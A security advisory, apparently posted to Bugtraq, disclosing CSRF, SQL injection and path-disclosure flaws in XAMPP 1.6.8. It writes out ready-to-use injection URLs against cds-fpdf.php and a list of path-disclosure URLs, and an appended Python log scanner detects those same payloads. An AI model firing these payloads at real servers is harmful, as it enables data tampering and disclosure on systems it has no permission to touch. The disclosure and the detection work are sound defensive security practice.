
Multiple vulnerabilities in XAMPP

http://www.securityfocus.com/bid/37999/exploit

Hello Bugtraq!

I continue informing you about multiple vulnerabilities in XAMPP.

-----------------------------

Advisory #7

CSRF, SQL Injection and Full path disclosure vulnerabilities in XAMPP

URL: http://websecurity.com.ua/3285/

Timeline:

27.06.2009 - found the vulnerabilities.

01.07.2009 - announced at my site.

02.07.2009 - informed developers.

08.08.2009 - disclosed at my site.

Details:

These are Cross-Site Request Forgery, SQL Injection and Full path disclosure vulnerabilities.

CSRF:

http://site/xampp/cds-fpdf.php

It's possible to delete or add data in the test table (both via CSRF and via Insufficient Authorization vulnerabilities), and also to conduct SQL Injection via CSRF attacks.

SQL Injection:

http://site/xampp/cds-fpdf.php?action=del&id=-1%20or%201=1 (register globals on)

http://site/xampp/cds-fpdf.php?interpret=1&titel=1&jahr=1),(version(),1,1

http://site/xampp/cds-fpdf.php?interpret=1&titel=',1,1),(version(),1,1)/* (mq off)

http://site/xampp/cds-fpdf.php?titel=1&interpret=',1),(version(),1,1)/* (mq off)

Attack is possible during access to admin panel (via Insufficient Authorization), or via CSRF.

Full path disclosure:

http://site/xampp/external/ps/draw.php

http://site/xampp/external/ps/hyperlinks.php

http://site/xampp/external/ps/image.php

http://site/xampp/external/ps/overprint.php

http://site/xampp/external/ps/ps.php?submit=OK

http://site/xampp/external/ps/shading.php

http://site/xampp/external/ps/spotcolor.php

http://site/xampp/external/ps/text.php

http://site/xampp/special/ps/draw.php

http://site/xampp/special/ps/hyperlinks.php

http://site/xampp/special/ps/image.php

http://site/xampp/special/ps/overprint.php

http://site/xampp/special/ps/ps.php?submit=OK

http://site/xampp/special/ps/shading.php

http://site/xampp/special/ps/spotcolor.php

http://site/xampp/special/ps/text.php

Vulnerable are XAMPP 1.6.8 and previous versions. And potentially next versions (including last version XAMPP 1.7.1).

Best wishes & regards,

MustLive

Administrator of Websecurity web site

http://websecurity.com.ua
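
A log-review sketch for the scripts and parameters listed in the advisory above, added here as an example; it is not part of MustLive's post or of XAMPP. The function names, the rule wording, the access-log format and the sample lines are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

CDS = "/xampp/cds-fpdf.php"  # script named in the advisory
PS_DEMO = re.compile(r"^/xampp/(external|special)/ps/[a-z]+\.php$")
REQUEST = re.compile(r'"(GET|POST) (\S+) HTTP/[\d.]+"')
# Assumption: legitimate artist/title/year values never need these characters.
SQL_META = re.compile(r"['\"();]|/\*|--")

def classify(line):
    """Return the findings for one access-log line (empty list if clean)."""
    m = REQUEST.search(line)
    if not m:
        return []
    method, target = m.group(1), urlsplit(m.group(2))
    params = parse_qs(target.query, keep_blank_values=True)  # URL-decodes values
    findings = []
    if target.path == CDS:
        if any(not v.isdigit() for v in params.get("id", [])):
            findings.append("non-numeric id")
        for name in ("interpret", "titel", "jahr"):
            if any(SQL_META.search(v) for v in params.get(name, [])):
                findings.append("SQL metacharacters in " + name)
        if method == "GET" and "del" in params.get("action", []):
            findings.append("delete via GET, check Referer for CSRF")
    elif PS_DEMO.match(target.path):
        findings.append("ps demo script requested")
    return findings

# Constructed sample log lines (client addresses from the documentation range).
SAMPLE = [
    '192.0.2.10 - - [01/Jul/2009:10:00:00 +0000] '
    '"GET /xampp/cds-fpdf.php?action=del&id=-1%20or%201=1 HTTP/1.1" 200 512',
    '192.0.2.10 - - [01/Jul/2009:10:00:05 +0000] '
    '"GET /xampp/cds-fpdf.php?interpret=Abba&titel=Gold&jahr=1992 HTTP/1.1" 200 512',
    '192.0.2.11 - - [01/Jul/2009:10:01:00 +0000] '
    '"GET /xampp/external/ps/draw.php HTTP/1.1" 200 300',
    '192.0.2.12 - - [01/Jul/2009:10:02:00 +0000] '
    '"GET /xampp/cds-fpdf.php?interpret=1&titel=%27,1,1) HTTP/1.1" 200 512',
]

def scan(lines):
    """Map line index -> findings for every line that triggered a rule."""
    return {i: f for i, line in enumerate(lines) if (f := classify(line))}

if __name__ == "__main__":
    for idx, found in scan(SAMPLE).items():
        print(idx, found)
```

Any hit on these paths from a non-local client also shows that the XAMPP demo pages are reachable from outside the machine.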